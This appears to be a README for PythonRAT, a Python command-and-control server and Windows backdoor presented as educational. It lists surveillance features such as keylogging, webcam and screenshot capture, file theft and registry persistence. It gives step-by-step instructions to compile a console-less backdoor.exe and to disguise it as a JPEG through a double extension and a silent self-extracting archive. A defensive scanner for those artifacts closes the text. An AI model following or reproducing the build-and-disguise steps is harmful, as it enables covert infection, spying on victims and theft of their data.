PythonRAT is a Command and Control (C2) server, written in Python 3, which can control multiple machines running its Remote Administration Trojan (RAT), forming a botnet cluster.
PythonRAT was developed for educational purposes and continues to be developed as such!
- Integrated keylogger written as a class
- Check privilege level (Administrator/User)
- Spawn other programs
- Download files from target
- Download files from specified URL
- Upload files to target
- C2 allows control of multiple target sessions
- Issue a sendall command to every active session
- Persistence by creating a registry entry (Windows)
- Conceals infection by writing files in AppData (Windows)
- Screenshot of the target's screen, sent to the server
- Remote shutdown of the backdoor (executable is NOT safely removed)
- **targets** --> Prints active sessions
- **session** *session num* --> Connects to the session (**background** to return)
- **clear** --> Clears the terminal screen
- **exit** --> Quits ALL active sessions and closes the C2 server!!
- **kill** *session num* --> Issues 'quit' to the specified target session
- **sendall** *command* --> Sends the *command* to ALL active sessions (e.g. sendall notepad)
- **quit** --> Quit the session with the target
- **clear** --> Clear the screen
- **background** / **bg** --> Send the session with the target to the background
- **cd** *directory name* --> Change directory on the target system
- **upload** *file name* --> Upload a file to the target machine from the working directory
- **download** *file name* --> Download a file from the target machine
- **get** *url* --> Download a file from the specified URL to the target's ./
- **keylog_start** --> Start the keylogger
- **keylog_dump** --> Print the keystrokes captured from the target (read from taskmanager.txt)
- **keylog_stop** --> Stop the keylogger and self-destruct its file
- **screenshot** --> Take a screenshot and send it to the server (./images/screenshots/)
- **webcam** --> Take an image with the webcam and send it to ./images/webcam/
- **start** *programName* --> Spawn a program using the backdoor, e.g. 'start notepad'
- **remove_backdoor** --> Removes the backdoor from the target!!!

===Windows Only===

- **persistence** *RegName* *filename* --> Create persistence in the registry; copies the backdoor to ~/AppData/Roaming/filename. Example: persistence Backdoor windows32.exe
- **check** --> Check whether the backdoor has administrator privileges
The C2 server has no external dependencies as of v0.9.2-alpha.
The backdoor relies on the following as of v0.10.1-alpha:
```
pip install mss pynput requests
```
The steps below compile the backdoor for deployment. To test the interaction between the C2 server and the backdoor without compiling it, see issue 1.
Python 2.7.14 Releases: https://www.python.org/downloads/release/python-2714/
```
sudo su
dpkg --add-architecture i386
apt update
apt install wine32
wget https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi
sudo wine msiexec -i ~/python-2.7.14.msi   # x86 arch
cd /root/.wine/drive_c/Python27
wine python.exe -m pip install pyinstaller requests mss pynput
```
```
$ pyinstaller --onefile --noconsole backdoor.py
```

Under Wine:

```
wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole ~/backdoor.py
```

Alternatively, if an icon has already been created:

```
wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole --icon ~/malware_128x128.ico ~/backdoor.py
```

This will produce ./dist/backdoor.exe
The executable backdoor.exe will be made to look like an image (jpg) file. By default, Windows does not show file extensions (e.g. backdoor.exe is shown in Windows Explorer as backdoor). Hence, we will create an SFX archive named wallpaper.jpg.exe, which Windows Explorer will show as wallpaper.jpg.
This requires an image file and a .ico icon created from it, which is assigned to the SFX archive so that the executable appears to be an image.
Of course, the same method could be applied to an audio, document or video file using an appropriate icon.
An SFX archive is not the only way of disguising the executable. When compiling with PyInstaller we can add the argument --add-data "/root/wallpaper.jpg;." together with --icon ~/wallpaper.ico.
```
wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole --add-data "/root/wallpaper.jpg;." --icon ~/malware_128x128.ico ~/backdoor.py
mv ./dist/backdoor.exe ./dist/wallpaper.jpg.exe
```
1. WinRAR > Add To Archive (image.jpg and backdoor.exe)
2. Rename archive to: image.jpg.exe
3. Add to SFX Archive (Y) and open Advanced>
   - **Setup > Run after extraction**: California-HD-Background.jpg, backdoor.exe
   - **Modes**: Unpack to temporary folder; Silent mode: Hide all
   - **Update**: Update mode: Extract and update files; Overwrite mode: Overwrite all files
   - **Text and icon**: Load SFX icon from the file (image ICO)
This will produce an SFX archive that looks like an image.
Inspecting the file will reveal that it is an executable, but the .exe extension is concealed. Furthermore, when viewed from the Desktop the file cannot be distinguished from a 'real' image.
Once opened, the SFX archive opens the image file inside the archive, and the malware executes afterwards.
Because of the --noconsole argument to PyInstaller, no console window is rendered.
The backdoor.exe process is visible in Task Manager and can be ended there if necessary.
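The disguise described above leaves two artifacts a defender can look for: a file whose name carries a decoy extension (image, document, audio, video) immediately followed by .exe, and an executable dropped directly under AppData\Roaming (where the persistence command copies the backdoor). The following is an added detection example, not code from the PythonRAT project; the directory listing it scans is constructed here for illustration, and the set of decoy extensions is an assumption that generalises the jpg/audio/document/video cases the text mentions.

```python
from pathlib import PureWindowsPath

# Constructed sample of a Windows directory listing (not output from any real host).
# The first and third names follow the wallpaper.jpg.exe pattern described above;
# the fourth matches the persistence command's ~/AppData/Roaming/<filename> drop.
SAMPLE_LISTING = [
    r"C:\Users\alice\Desktop\wallpaper.jpg.exe",
    r"C:\Users\alice\Desktop\holiday.jpg",
    r"C:\Users\alice\Downloads\report.pdf.exe",
    r"C:\Users\alice\AppData\Roaming\windows32.exe",
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini",
    r"C:\Program Files\Git\git-bash.exe",
]

# Assumed set of "decoy" extensions: the text names image, audio, document and
# video files as the kinds an executable is dressed up as.
DECOY_EXTENSIONS = {
    ".jpg", ".jpeg", ".png", ".gif", ".bmp",          # images
    ".pdf", ".doc", ".docx", ".txt",                  # documents
    ".mp3", ".wav", ".mp4", ".avi", ".mkv",           # audio / video
}


def explorer_display_name(path: str) -> str:
    """Name as Explorer shows it with 'Hide extensions for known file types' on:
    the final extension is dropped, so wallpaper.jpg.exe appears as wallpaper.jpg."""
    p = PureWindowsPath(path)
    return p.stem if p.suffix else p.name


def has_double_extension(path: str) -> bool:
    """True when a decoy extension is immediately followed by .exe."""
    suffixes = [s.lower() for s in PureWindowsPath(path).suffixes]
    return len(suffixes) >= 2 and suffixes[-1] == ".exe" and suffixes[-2] in DECOY_EXTENSIONS


def staged_in_appdata_roaming(path: str) -> bool:
    """True for an .exe sitting directly in <user>\\AppData\\Roaming (no subfolder)."""
    parts = [part.lower() for part in PureWindowsPath(path).parts]
    if "roaming" not in parts or "appdata" not in parts or not parts[-1].endswith(".exe"):
        return False
    # The Roaming folder must be the file's immediate parent.
    return parts.index("roaming") == len(parts) - 2


def scan_listing(paths):
    """Return [(path, [reason, ...])] for every path that trips a check."""
    findings = []
    for path in paths:
        reasons = []
        if has_double_extension(path):
            reasons.append("decoy extension followed by .exe; Explorer would show it as "
                           + explorer_display_name(path))
        if staged_in_appdata_roaming(path):
            reasons.append("executable staged directly under AppData\\Roaming")
        if reasons:
            findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in scan_listing(SAMPLE_LISTING):
        print(path)
        for reason in reasons:
            print("   -", reason)
```

On a real host the same functions can be fed the output of a directory walk (for example `os.walk` over user profile directories); the suspicious-name check is cheap enough to run on every file, while the AppData\Roaming check narrows the result to the staging location this backdoor uses.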